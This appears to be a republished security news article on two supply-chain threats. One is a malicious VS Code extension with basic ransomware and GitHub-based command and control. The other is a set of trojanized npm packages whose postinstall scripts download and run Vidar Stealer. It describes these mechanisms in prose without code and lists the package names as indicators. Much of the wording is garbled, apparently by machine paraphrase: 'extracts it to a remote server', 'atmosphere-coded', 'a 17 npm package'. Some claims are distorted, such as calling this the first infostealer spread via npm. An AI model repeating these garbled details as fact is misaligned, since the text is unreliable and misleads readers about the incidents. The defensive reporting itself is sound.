Cybersecurity researchers have flagged a malicious Visual Studio Code (VS Code) extension with basic ransomware functionality that appears to have been created with the help of artificial intelligence, or vibe-coded.
Secure Annex researcher John Tuckner, who flagged the susvsex extension, said the extension was not trying to hide any malicious functionality. This extension was uploaded on November 5, 2025 by a user named ‘suspublisher18’ with the description ‘Just testing’ and the email address ‘donotsupport@example’.[.]Com”
The extension’s description says, “Automatically compress, upload, and encrypt files from C:\Users\Public\testing (Windows) or /tmp/testing (macOS) on first launch.” As of November 6th, Microsoft stepped in to remove it from the official VS Code Extension Marketplace.
According to details shared by suspublisher18, the extension is designed to automatically launch on any event, including when VS Code is installed or started, and calls a function called zipUploadAndEncrypt. This function creates a ZIP archive of the target directory, extracts it to a remote server, and replaces the files with encrypted versions.
“Fortunately, TARGET_DIRECTORY is configured as a test staging directory, so it has little impact for now, but it can be easily updated with extension releases or by commands sent through the C2 channel, which we’ll discuss next,” Tuckner said.
In addition to encryption, the malicious extension also uses GitHub for command and control (C2) by polling private GitHub repositories for new commands, which are executed by parsing the “index.html” file. The results of the command execution are written back to the “requirements.txt” file in the same repository using a GitHub access token embedded in the code.
The GitHub account (aykhanmv) associated with the repository remains active, and the developer claims to be from the city of Baku, Azerbaijan.
“Irrelevant comments detailing functionality, README files with execution instructions, and placeholder variables are telltale signs of ‘atmosphere-coded’ malware,” Tuckner said. “The extension package inadvertently included a decryption tool, command and control server code, and a GitHub access key to the C2 server, which could be used by others to take over the C2.”
Trojanized npm package drops Vidar Infostealer
This disclosure comes after Datadog Security Labs discovered a 17 npm package that masqueraded as a benign software development kit (SDK) and provided advertised functionality, but was designed to covertly run Vidar Stealer on infected systems. This development marks the first time that an information stealer has been distributed via the npm registry.
Some packages were first flagged on October 21, 2025, with subsequent uploads recorded the next day and October 26, according to a cybersecurity firm tracking the cluster under the name MUT-4831. The names of the packages published by accounts named “aartje” and “saliii229911” are as follows.
abeya-tg-api bael-god-admin bael-god-api bael-god- thanks botty-fork-baby cursor-ai-fork cursor-app-fork custom telegram-bot-api custom-tg-bot-plan icon-react-fork react-icon-pkg sabaoa-tg-api sabay-tg-api sai-tg-api salli-tg-api telegram-bot-start telegram-bot-starter
Both accounts were subsequently banned, but the library was downloaded at least 2,240 times before being removed. That said, Datadog noted that many of these downloads may be the result of automated scrapers.
The attack chain itself is very simple, starting as part of a post-installation script specified in a ‘package.json’ file that downloads a ZIP archive from an external server (‘bullethost’).[.]cloud domain”) and run the Vidar executable contained within the ZIP file. The Vidar 2.0 sample was found to use hardcoded Telegram and Steam accounts as dead drop resolvers to fetch the actual C2 server.
Some variants use a post-installation PowerShell script embedded directly in the package.json file to download the ZIP archive, which then passes execution control to a JavaScript file to complete the remaining steps of the attack.
‘
“It is unclear why MUT-4831 chose to modify its post-installation script in this way,” said security researchers Tesnim Hamdouni, Ian Kretz, and Sebastian Obregoso. “One possible explanation is that diversifying implementations may give an advantage to attackers in terms of surviving detection.”
This discovery is just one in a long list of supply chain attacks targeting the open source ecosystem across npm, PyPI, RubyGems, and Open VSX, making it important for developers to perform due diligence before installing packages, review changelogs, and be aware of techniques such as typosquatting and dependency confusion.
Source link
